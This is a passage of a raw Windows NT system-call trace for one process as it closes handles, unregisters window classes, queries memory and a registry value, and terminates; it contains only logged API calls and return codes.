0x0 03736 896 NtClose (344, ... ) == 0x0 03737 896 NtClose (348, ... ) == 0x0 03738 896 NtQueryVirtualMemory (-1, 0x528e0c, Basic, 28, ... {BaseAddress=0x528000,AllocationBase=0x400000,AllocationProtect=0x80,RegionSize=0xf000,State=0x1000,Protect=0x40,Type=0x1000000,}, 28, ) == 0x0 03739 896 NtQueryInformationProcess (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0 03740 896 NtQueryInformationProcess (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0 03741 896 NtQueryVirtualMemory (-1, 0x4209bf, Basic, 28, ... {BaseAddress=0x420000,AllocationBase=0x400000,AllocationProtect=0x80,RegionSize=0xfc000,State=0x1000,Protect=0x40,Type=0x1000000,}, 28, ) == 0x0 03742 896 NtTerminateProcess (0, 0, ... 01691 376 NtWaitForMultipleObjects ... ) == 0xc0 03742 896 NtTerminateProcess ... ) == 0x0 03743 896 NtClose (324, ... ) == 0x0 03744 896 NtClose (312, ... ) == 0x0 03745 896 NtClose (316, ... ) == 0x0 03746 896 NtClose (320, ... ) == 0x0 03747 896 NtSetInformationThread (-2, ZeroTlsCell, {ZeroTlsCell=0x11,}, 4, ... ) == 0x0 03748 896 NtFreeVirtualMemory (-1, (0xd70000), 0, 32768, ... (0xd70000), 65536, ) == 0x0 03749 896 NtClose (248, ... ) == 0x0 03750 896 NtClose (252, ... ) == 0x0 03751 896 NtClose (260, ... ) == 0x0 03752 896 NtClose (256, ... ) == 0x0 03753 896 NtClose (264, ... ) == 0x0 03754 896 NtClose (268, ... ) == 0x0 03755 896 NtClose (272, ... ) == 0x0 03756 896 NtClose (288, ... ) == 0x0 03757 896 NtClose (284, ... ) == 0x0 03758 896 NtClose (280, ... ) == 0x0 03759 896 NtClose (276, ... ) == 0x0 03760 896 NtUserGetAtomName (49211, 1241032, ... ) == 0xf 03761 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03762 896 NtUserGetAtomName (49213, 1241032, ... ) == 0xd 03763 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03764 896 NtUserGetAtomName (49215, 1241032, ... ) == 0x10 03765 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03766 896 NtUserGetAtomName (49217, 1241032, ... ) == 0x12 03767 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03768 896 NtUserGetAtomName (49219, 1241032, ... ) == 0xd 03769 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03770 896 NtUserGetAtomName (49221, 1241032, ... ) == 0xb 03771 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03772 896 NtUserGetAtomName (49223, 1241032, ... ) == 0xf 03773 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03774 896 NtUserGetAtomName (49225, 1241032, ... ) == 0xd 03775 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03776 896 NtUserGetAtomName (49227, 1241032, ... ) == 0x11 03777 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03778 896 NtUserGetAtomName (49229, 1241032, ... ) == 0xf 03779 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03780 896 NtUserGetAtomName (49231, 1241032, ... ) == 0x11 03781 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03782 896 NtUserGetAtomName (49233, 1241032, ... ) == 0xf 03783 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03784 896 NtUserGetAtomName (49235, 1241032, ... ) == 0xc 03785 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03786 896 NtUserGetAtomName (49237, 1241024, ... ) == 0xd 03787 896 NtUserUnregisterClass (1241084, 1560870912, 1241072, ... ) == 0x1 03788 896 NtUserGetAtomName (49239, 1241024, ... ) == 0x11 03789 896 NtUserUnregisterClass (1241084, 1560870912, 1241072, ... ) == 0x1 03790 896 NtUserGetAtomName (49241, 1241032, ... ) == 0xc 03791 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03792 896 NtUserGetAtomName (49243, 1241032, ... ) == 0xe 03793 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03794 896 NtUserGetAtomName (49245, 1241032, ... ) == 0x8 03795 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03796 896 NtUserGetAtomName (49247, 1241032, ... ) == 0xd 03797 896 NtUserUnregisterClass (1241092, 1560870912, 1241080, ... ) == 0x1 03798 896 NtUnmapViewOfSection (-1, 0xde0000, ... ) == 0x0 03799 896 NtSetInformationThread (-2, ZeroTlsCell, {ZeroTlsCell=0xb,}, 4, ... ) == 0x0 03800 896 NtFreeVirtualMemory (-1, (0xd30000), 0, 32768, ... (0xd30000), 65536, ) == 0x0 03801 896 NtClose (172, ... ) == 0x0 03802 896 NtSetInformationThread (-2, ZeroTlsCell, {ZeroTlsCell=0xc,}, 4, ... ) == 0x0 03803 896 NtUserQueryWindow (65670, 0, ... ) == 0x6b8 03804 896 NtUserQueryWindow (65670, 1, ... ) == 0x6bc 03805 896 NtUnmapViewOfSection (-1, 0xd10000, ... ) == 0x0 03806 896 NtClose (168, ... ) == 0x0 03807 896 NtSetInformationThread (-2, ZeroTlsCell, {ZeroTlsCell=0x9,}, 4, ... ) == 0x0 03808 896 NtSetInformationThread (-2, ZeroTlsCell, {ZeroTlsCell=0xa,}, 4, ... ) == 0x0 03809 896 NtClose (144, ... ) == 0x0 03810 896 NtClose (140, ... ) == 0x0 03811 896 NtClose (148, ... ) == 0x0 03812 896 NtUserGetAtomName (49211, 1241064, ... ) == 0xf 03813 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03814 896 NtUserGetAtomName (49213, 1241064, ... ) == 0xd 03815 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03816 896 NtUserGetAtomName (49215, 1241064, ... ) == 0x10 03817 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03818 896 NtUserGetAtomName (49217, 1241064, ... ) == 0x12 03819 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03820 896 NtUserGetAtomName (49219, 1241064, ... ) == 0xd 03821 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03822 896 NtUserGetAtomName (49221, 1241064, ... ) == 0xb 03823 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03824 896 NtUserGetAtomName (49223, 1241064, ... ) == 0xf 03825 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03826 896 NtUserGetAtomName (49225, 1241064, ... ) == 0xd 03827 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03828 896 NtUserGetAtomName (49227, 1241064, ... ) == 0x11 03829 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03830 896 NtUserGetAtomName (49229, 1241064, ... ) == 0xf 03831 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03832 896 NtUserGetAtomName (49231, 1241064, ... ) == 0x11 03833 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03834 896 NtUserGetAtomName (49233, 1241064, ... ) == 0xf 03835 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03836 896 NtUserGetAtomName (49235, 1241064, ... ) == 0xc 03837 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03838 896 NtUserGetAtomName (49237, 1241056, ... ) == 0xd 03839 896 NtUserUnregisterClass (1241116, 2000486400, 1241104, ... ) == 0x1 03840 896 NtUserGetAtomName (49239, 1241056, ... ) == 0x11 03841 896 NtUserUnregisterClass (1241116, 2000486400, 1241104, ... ) == 0x1 03842 896 NtUserGetAtomName (49241, 1241064, ... ) == 0xc 03843 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03844 896 NtUserGetAtomName (49243, 1241064, ... ) == 0xe 03845 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03846 896 NtUserGetAtomName (49245, 1241064, ... ) == 0x8 03847 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03848 896 NtUserGetAtomName (49247, 1241064, ... ) == 0xd 03849 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03850 896 NtUserGetAtomName (49175, 1241064, ... ) == 0x6 03851 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03852 896 NtUserGetAtomName (49177, 1241064, ... ) == 0x6 03853 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03854 896 NtUserGetAtomName (49176, 1241064, ... ) == 0x4 03855 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03856 896 NtUserGetAtomName (49178, 1241064, ... ) == 0x7 03857 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03858 896 NtUserGetAtomName (49180, 1241064, ... ) == 0x8 03859 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03860 896 NtUserGetAtomName (49182, 1241064, ... ) == 0x9 03861 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03862 896 NtUserGetAtomName (49179, 1241056, ... ) == 0x9 03863 896 NtUserUnregisterClass (1241116, 2000486400, 1241104, ... ) == 0x1 03864 896 NtUserGetAtomName (49256, 1241064, ... ) == 0x7 03865 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03866 896 NtUserGetAtomName (49258, 1241064, ... ) == 0xd 03867 896 NtUserUnregisterClass (1241124, 2000486400, 1241112, ... ) == 0x1 03868 896 NtUnmapViewOfSection (-1, 0xd20000, ... ) == 0x0 03869 896 NtDeviceIoControlFile (76, 80, 0x0, 0x12f10c, 0x22415c, (76, 80, 0x0, 0x12f10c, 0x22415c, "U\4\376\14\272\223\15D\243\376U9s\320\267#T\0\0\0\0\0\0\0\10 \260\0\306\205\337w", 32, 32, ... {status=0x0, info=32}, "U\4\376\14\272\223\15D\243\376U9s\320\267#T\0\0\0\0\0\0\0\10 \260\0\306\205\337w", ) , 32, 32, ... {status=0x0, info=32}, (76, 80, 0x0, 0x12f10c, 0x22415c, "U\4\376\14\272\223\15D\243\376U9s\320\267#T\0\0\0\0\0\0\0\10 \260\0\306\205\337w", 32, 32, ... {status=0x0, info=32}, "U\4\376\14\272\223\15D\243\376U9s\320\267#T\0\0\0\0\0\0\0\10 \260\0\306\205\337w", ) , ) == 0x0 03870 896 NtDeviceIoControlFile (76, 80, 0x0, 0x12f0d4, 0x228168, (76, 80, 0x0, 0x12f0d4, 0x228168, "T\0\0\0\0\0\0\0", 8, 0, ... {status=0x0, info=0}, 0x0, ) , 8, 0, ... {status=0x0, info=0}, 0x0, ) == 0x0 03871 896 NtDeviceIoControlFile (76, 80, 0x0, 0x12f10c, 0x22415c, (76, 80, 0x0, 0x12f10c, 0x22415c, "\254\253\177yX{\226G\271$\325\21x\245\234\344l\0\0\0\0\0\0\0\10 \260\0\306\205\337w", 32, 32, ... {status=0x0, info=32}, "\254\253\177yX{\226G\271$\325\21x\245\234\344l\0\0\0\0\0\0\0\10 \260\0\306\205\337w", ) , 32, 32, ... {status=0x0, info=32}, (76, 80, 0x0, 0x12f10c, 0x22415c, "\254\253\177yX{\226G\271$\325\21x\245\234\344l\0\0\0\0\0\0\0\10 \260\0\306\205\337w", 32, 32, ... {status=0x0, info=32}, "\254\253\177yX{\226G\271$\325\21x\245\234\344l\0\0\0\0\0\0\0\10 \260\0\306\205\337w", ) , ) == 0x0 03872 896 NtDeviceIoControlFile (76, 80, 0x0, 0x12f0d4, 0x228168, (76, 80, 0x0, 0x12f0d4, 0x228168, "l\0\0\0\0\0\0\0", 8, 0, ... {status=0x0, info=0}, 0x0, ) , 8, 0, ... {status=0x0, info=0}, 0x0, ) == 0x0 03873 896 NtWaitForSingleObject (224, 0, 0x0, ... ) == 0x0 03874 896 NtClearEvent (224, ... ) == 0x0 03875 896 NtSetEvent (224, ... 0x0, ) == 0x0 03876 896 NtClose (224, ... ) == 0x0 03877 896 NtSetInformationThread (-2, ZeroTlsCell, {ZeroTlsCell=0x5,}, 4, ... ) == 0x0 03878 896 NtSetInformationThread (-2, ZeroTlsCell, {ZeroTlsCell=0x6,}, 4, ... ) == 0x0 03879 896 NtSetInformationThread (-2, ZeroTlsCell, {ZeroTlsCell=0x7,}, 4, ... ) == 0x0 03880 896 NtClose (64, ... ) == 0x0 03881 896 NtSetInformationThread (-2, ZeroTlsCell, {ZeroTlsCell=0x4,}, 4, ... ) == 0x0 03882 896 NtSetInformationThread (-2, ZeroTlsCell, {ZeroTlsCell=0x2,}, 4, ... ) == 0x0 03883 896 NtQueryVirtualMemory (-1, 0x528e0c, Basic, 28, ... {BaseAddress=0x528000,AllocationBase=0x400000,AllocationProtect=0x80,RegionSize=0xf000,State=0x1000,Protect=0x40,Type=0x1000000,}, 28, ) == 0x0 03884 896 NtQueryInformationProcess (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0 03885 896 NtQueryInformationProcess (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0 03886 896 NtQueryVirtualMemory (-1, 0x528e0c, Basic, 28, ... {BaseAddress=0x528000,AllocationBase=0x400000,AllocationProtect=0x80,RegionSize=0xf000,State=0x1000,Protect=0x40,Type=0x1000000,}, 28, ) == 0x0 03887 896 NtClose (44, ... ) == 0x0 03888 896 NtClose (76, ... ) == 0x0 03889 896 NtFreeVirtualMemory (-1, (0xae0000), 4096, 32768, ... (0xae0000), 4096, ) == 0x0 03890 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize"}, ... 76, ) }, ... 76, ) == 0x0 03891 896 NtQueryValueKey (76, (76, "DisableMetaFiles", Partial, 20, ... ) , Partial, 20, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03892 896 NtClose (76, ... ) == 0x0 03893 896 NtRequestWaitReplyPort (24, {20, 48, new_msg, 0, 1362936, 2088885979, 1, 4396612} (24, {20, 48, new_msg, 0, 1362936, 2088885979, 1, 4396612} "\0\0\0\0\3\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {20, 48, reply, 0, 1252, 896, 82438, 0} "\0\0\0\0\3\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0" ) ... {20, 48, reply, 0, 1252, 896, 82438, 0} (24, {20, 48, new_msg, 0, 1362936, 2088885979, 1, 4396612} "\0\0\0\0\3\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {20, 48, reply, 0, 1252, 896, 82438, 0} "\0\0\0\0\3\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0" ) ) == 0x0 03894 896 NtTerminateProcess (-1, 0, ...